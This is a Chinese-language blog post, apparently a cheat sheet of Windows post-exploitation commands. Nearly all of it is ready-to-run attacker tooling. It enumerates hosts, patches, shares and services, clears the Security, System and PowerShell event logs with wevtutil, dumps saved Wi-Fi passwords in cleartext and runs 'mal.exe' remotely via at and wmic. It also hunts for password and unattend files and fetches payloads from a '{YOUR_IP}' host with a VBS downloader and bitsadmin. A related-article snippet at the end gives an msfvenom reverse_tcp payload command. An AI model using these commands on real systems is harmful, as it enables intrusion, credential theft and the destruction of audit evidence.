Windows后渗透
My
命令行下收集主机信息 使用wmic识别安装到系统中的补丁情况: wmic qfe get description,installedOn 识别正在运行的服务: sc query type= service 识别开机启动的程序,包括路径: net start wmic startup list full ping探测存活主机 D:\>for /L %I in (100,1,254) DO @ping -w 1 -n 1 10.18.180.%I | findstr "TTL=" >> pinglive.txt 查看系统中网卡的IP地址和MAC地址: D:\>wmic nicconfig get ipaddress,macaddress 查看当前系统是否有屏保保护,延迟是多少: wmic desktop get screensaversecure,screensavertimeout 查看系统中开放的共享 : D:\>wmic share get name,path D:\>net share 查看系统中开启的日志 : C:\>wmic nteventlog get path,filename,writeable 清除相关的日志(这里是全部清除) wevtutil cl "windows powershell" wevtutil cl "security" wevtutil cl "system" 查看系统中安装的软件以及版本: C:\>wmic product get name,version 查看某个进程的详细信息 (路径,命令行参数等): C:\>wmic process where name="chrome.exe" list full 终止一个进程 D:\>wmic process where name="xshell.exe" call terminate D:\>ntsd -c q -p 进程的PID 显示系统中的曾经连接过的无线密码 D:\>netsh wlan show profiles D:\>netsh wlan show profiles name="profiles的名字" key=clear 查看当前系统是否是VMWARE: C:\>wmic bios list full | find /i "vmware"
远程执行命令
at \\[remote host name or IP address] 12:00 cmd /c "C:\windows\temp\mal.exe"
wmic /node:[IP address] /user:”[user name]” /password:”[password]” process call create “cmd /c c:\Windows\System32\net.exe user”
Freebuf引用
1.获取操作系统信息
识别操作系统名称及版本:
中文系统:systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
英文系统:systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
查看所有环境变量: SET
识别系统体系结构: echo %PROCESSOR_ARCHITECTURE%
2.获取网络信息
查看路由表信息:route print
查看ARP缓存信息: arp -A
查看防火墙规则:
netstat -ano netsh firewall show config netsh firewall show state
3.应用程序及服务信息
查看计划任务: schtasks /QUERY /fo LIST /v
中文系统调整GBK编码为437美国编码:chcp 437
然后:schtasks /QUERY /fo LIST /v
查看服务进程ID:tasklist /SVC
查看安装驱动: driverquery
查看安装程序和版本信息(漏洞利用线索):wmic product list brief
查看服务、进程和启动程序信息:
wmic service list brief wmic process list brief wmic startup list brief
查看.msi程序的执行权限:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
查看是否设置有setuid和setgid:
reg query HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits
查看安装补丁和时间信息:
wmic qfe get Caption,Description,HotFixID,InstalledOn
查看特定漏洞补丁信息:
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"
4.敏感数据和目录
查找密码文件或其它敏感文件:
dir /b/s password.txt dir /b/s config.* findstr /si password *.xml *.ini *.txt findstr /si login *.xml *.ini *.txt
无人值守安装文件:
这些文件通常包含base64模式的密码信息。这类文件在一些大型企业网络或GHO系统中可以发现,文件通常的位置如下:
C:\sysprep.inf C:\sysprep\sysprep.xml C:\Windows\Panther\Unattend\Unattended.xml C:\Windows\Panther\Unattended.xml
5.文件系统
可以通过调用系统预安装程序语言查看当前可访问目录或文件权限,如python下:
import os; os.system("cmd /c {command here}")
使用copy con命令创建ftp执行会话:
范例
>copy con ftp.bat #创建一个名为ftp.bat的批处理文件
ftp # 输入执行会话名称,按回车到下一行,之后按CTRL+Z结束编辑,再按回车退出
> ftp.bat # 执行创建的文件
ftp> # 执行ftp命令
ftp> !{command} # e.g. - !dir or !ipconfig
使用copy con命令创建VBS脚本文件:
> copy con commandExec.vbs #创建VBS脚本文件 Call WScript.CreateObject(, True) #VBS文件内容 > commandExec.vbs #执行脚本文件 检查文件夹可写状态: dir /a-r-d /s /b
6.一个有用的文件上传脚本
' downloadfile.vbs
' Set your settings
strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}"
strHDLocation = "c:\\{FILE_NAME.EXT}"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
该脚本是一个社区发布的,你可以以下这种方式运行它:
(1)cscript.exe downloadfile.vbs
(2)bitsadmin命令 如果目标系统是Win7及以上操作系统,可以使用bitsadmin命令,bitsadmin是一个命令行工具,可用于创建下载上传进程:
bitsadmin /transfer job_name /download /priority priority URL local\path\file
bitsadmin /transfer mydownloadjob /download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT} C:\path\download.exe
如:bitsadmin /transfer n http://download.fb.com/file/xx.zip c:\pentest\xx.zip
参考链接
SourceURL:http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
http://www.freebuf.com/articles/system/114731.html
http://www.91ri.org/7894.html Windows渗透与提权:技巧总结篇
Windows后渗透的更多相关文章
- kali linux之选择和修改exp与windows后渗透
网上公开的exp代码,选择可信赖的exp源,exploit-db,securityfocus,searchsploit,有能力修改exp(python,perl,ruby,c,c++.......) ...
- 渗透攻防工具篇-后渗透阶段的Meterpreter
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...
- Metasploit Framework(8)后渗透测试(一)
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163. ...
- msf后渗透
生成exe后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.e ...
- 火眼推出Windows免费渗透测试套件,包含140多款工具
火眼推出Windows免费渗透测试套件,包含140多款工具 2019年3月28日,火眼发布了一个包含超过140个开源Windows渗透工具包,红队渗透测试员和蓝队防御人员均拥有了顶级侦察与漏洞利用程序 ...
- EXP查询合集提权后渗透必备
0x00 整理的一些后渗透提权需要用到的一些漏洞,后渗透提权的时候可以看一下目标机那些补丁没打,再进行下一步渗透提权. 0x01 CVE-2019-0803 [An elevation of priv ...
- 后渗透神器Cobalt Strike的安装
0x01 简介 Cobalt Strike集成了端口转发.扫描多模式端口监听Windows exe木马,生成Windows dll(动态链接库)木马,生成java木马,生成office宏病毒,生成木马 ...
- Meterpreter后渗透之信息收集
在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础 记录一下关于meterpreter 信息收集的使用 环境: kali linux 192.168.190.141 xp ...
- 超实用!手把手教你如何用MSF进行后渗透测试!
在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目 ...
随机推荐
- charles支持https抓包
前言 最近发现访问项目的网页偶尔会被插入广告,很有可能是运营商劫持流量插入进去的,我在家里使用的长城宽带打开非加密的网页,时不时会弹个广告窗,这个也算是中国特色了.因此计划项目上线https,抓包分析 ...
- linux c 需要掌握的技能大概——前辈的话
gcc+gdb+makefile+vi是一套组合,不能单纯的拆分开来学习. gcc主编译单个文件 gdb调试 makefile用于大型工程解决不同源文件的依赖关系 vi/emacs是编辑器 如果有条件 ...
- python命令调用函数os.popen
参考自xerosploit 描述:利用os.popen()函数调用系统命令nmap进行扫描,并用grep命令对扫描结果关键内容进行提取 代码 #!/usr/bin/env pthon #--*--co ...
- npoi导入--从varchar数据类型到datetime数据类型转换产生一个超出范围的值问题
一,导入问题如图: 二,解决方法和原因: 1,经过调试发现导入获取到的日期数据被装换成1/1/10 0:00,如下图: 而将以上的数据插入数据库类型为datatime的列时会报错 2,经过去了解npo ...
- 使用node.js编写脚本将JSON数据转换为SQL语句
安装依赖模块 当node.js脚本在运行的时候,需要很多支持模块,这些模块存储在node_modules文件夹中.该脚本在执行过程中需要使用到fs.string-format两个支持模块,作用分别是: ...
- LED :制作一个追逐序列(霹雳游侠)
; ,,}; ; void setup() { ; led<NbrLeds; led++){ pinMode(ledPins[led], OUTPUT); } } void loop() { ; ...
- 命令行启动Hololens Emulator,可解决内存不足的问题
有时候在虚拟机测试时常会出现 内存不足 的情况,导致应用卡顿,调整 /memsize 参数大小: start "HoloLens" "C:\Program Files ( ...
- DiskGenius(磁盘分区/数据恢复) 32位 V4.9.1 免费绿色版
软件名称: DiskGenius(磁盘分区/数据恢复) 32位 软件语言: 简体中文 授权方式: 免费软件 运行环境: Win 32位/64位 软件大小: 19.5MB 图片预览: 软件简介: Dis ...
- sulime text3
sublime text 3 详细说明--包括快捷键 sublime 插件安装 快捷键 sunlime (需要先安装package control,ctrl+shift+p,输入insall之后安装插 ...
- [SQL基础教程] 2-3 逻辑运算符
[SQL基础教程] 2-3 逻辑运算符 NOT AND OR 优先级 ( )改变优先级 AND 优先级高于 OR NULL 引入三值逻辑